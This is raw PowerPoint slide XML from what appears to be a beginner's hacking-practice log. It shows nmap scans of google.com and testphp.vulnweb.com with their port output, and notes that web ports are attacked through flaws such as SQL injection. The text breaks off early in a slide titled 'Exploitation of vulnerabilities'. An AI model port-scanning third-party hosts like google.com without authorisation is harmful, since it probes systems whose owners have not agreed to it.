        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3432175" y="996950"/>
            <a:ext cx="92392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1675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>DAY -3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BF3EEC3-214D-681A-8BAA-6388F65CA9CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="901700" y="1576388"/>
            <a:ext cx="5508625" cy="723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1675"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Finding ports on - nmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Open kali linux </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3363"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Open terminal </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3363"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -3</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>nmap google.com nmap google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Starting Nmap 7.93 ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://nmap.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t> ) at 2023-07-24 01:00 EDT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Nmap scan report for google.com (142.250.182.46)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Host is up (0.014s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Other addresses for google.com (not scanned): 2404:6800:4007:81a::200e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>rDNS record for 142.250.182.46: maa05s19-in-f14.1e100.net Not shown: 996 filtered tcp ports (no-response)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>PORT STATE SERVICE 25/tcp open smtp 53/tcp open domain</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4"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EC8B0C4E-DB83-B835-DD71-F60658AA2217}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="941388"/>
            <a:ext cx="5889625" cy="796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63"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="2100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>80/tcp open http 443/tcp open https</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>I got 4 open ports 25/tcp open smtp 53/tcp open domain 80/tcp http 443/tcp https </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Using chat gpt or google i got this information about those 2 open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="1263"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>80 HTTP, 443 HTTPS, they are used by web servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Can you hack something through port 80/443? It depends on the specific service that runs on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2275"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>those ports (which specific web server, i.e. nginx), and on the content which is provided by the web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2275"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="425"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>server. Usually it's latter which is vulnerable (sql injection, IDOR, look at OWASP top 10), even</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>though also the web server can be configured wrongly</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20D440B4-2B23-36F1-3814-562AD4ED99E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="911225" y="954088"/>
            <a:ext cx="755650"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Aft>
                <a:spcPts val="1475"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>It is used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14339" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA8E3E8B-CEA3-7041-D3CE-EFF5C01B975C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="901700" y="1362075"/>
            <a:ext cx="57213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50"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1475"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1475"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Port 80 is used for unencrypted web traffic and port 443 is used for encrypted web traffic.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14340" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B960E3-BC81-C855-63B2-0533F9DE533A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717848" y="2273300"/>
            <a:ext cx="5798840" cy="2467868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22242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1250"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1475"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="56788D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>*—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4477C7"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="56788D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>nnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="56788D"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Starting Nmap 7.93 ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://nmap.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ) at 2023-07-24 01:00 EOT Nmap scan report for google.com (142.250.182.46)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host is up (0.014s latency).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1250"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Other addresses for google.com (not scanned): 2404:6800:4007:81a ::200e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rDNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> record for 142.250.182.46: maa05sl9-in-fl4.lel00.net Not shown: 996 filtered </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ports (no-response)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="1250"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="625"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PORT STATE SERVICE 25/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> open smtp 53/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> open domain 80/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> open http 443/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> open https</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="2725"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Nmap done: 1 IP address (1 host up) scanned in 5.04 seconds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14341" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA035BA6-FDAB-D0C8-7C63-6AE5E4A620BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717848" y="4979988"/>
            <a:ext cx="5433715" cy="2929532"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22242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2763"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2725"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port-443 allows data transmission over a secured network, while Port 80 enables data transmission in plain text.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2763"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Users will get an insecure warning if he tries to access a non-HTTPS web page. Port 443 encrypts network data packets before data transmission takes place.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4" name="arrow.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31D63E-5785-5DE1-CFB5-66D700D0D63B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="645840" y="1085850"/>
            <a:ext cx="6440760" cy="3943350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="22242C"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2730"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>What is TCP 443 used for?    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9A9EA3"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>^</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2664"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>The Internet Engineering Task Force (IETF) recognizes the TCP port number 443 as the default HTTPS protocol. It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>provides an encryption algorithm for exchanging information between web servers and browsers. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B6B8BE"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTPS port 443 works by securing network traffic packets before the data transmission occurs.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36DF7726-3917-D273-92E9-91E07D5DFD76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3432175" y="1000125"/>
            <a:ext cx="930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1675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>DAY -4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68B1E4EA-BF46-04D8-FD91-B11CD6B73448}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="898525" y="1573213"/>
            <a:ext cx="5935663" cy="724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1675"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1675"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2500" b="1"/>
              <a:t>Exploitation of vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step -1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>testphp.vulnweb.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Step-2 In terminal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>nmap testphp.vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Starting Nmap 7.94 ( https//nmap.org ) at 2023-07-14 13:50 IST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>Nmap scan report for testphp.vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="3238"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" b="1"/>
              <a:t>(44.228.249.3)</a:t>
            </a:r>
          </a:p>
          <a:p>
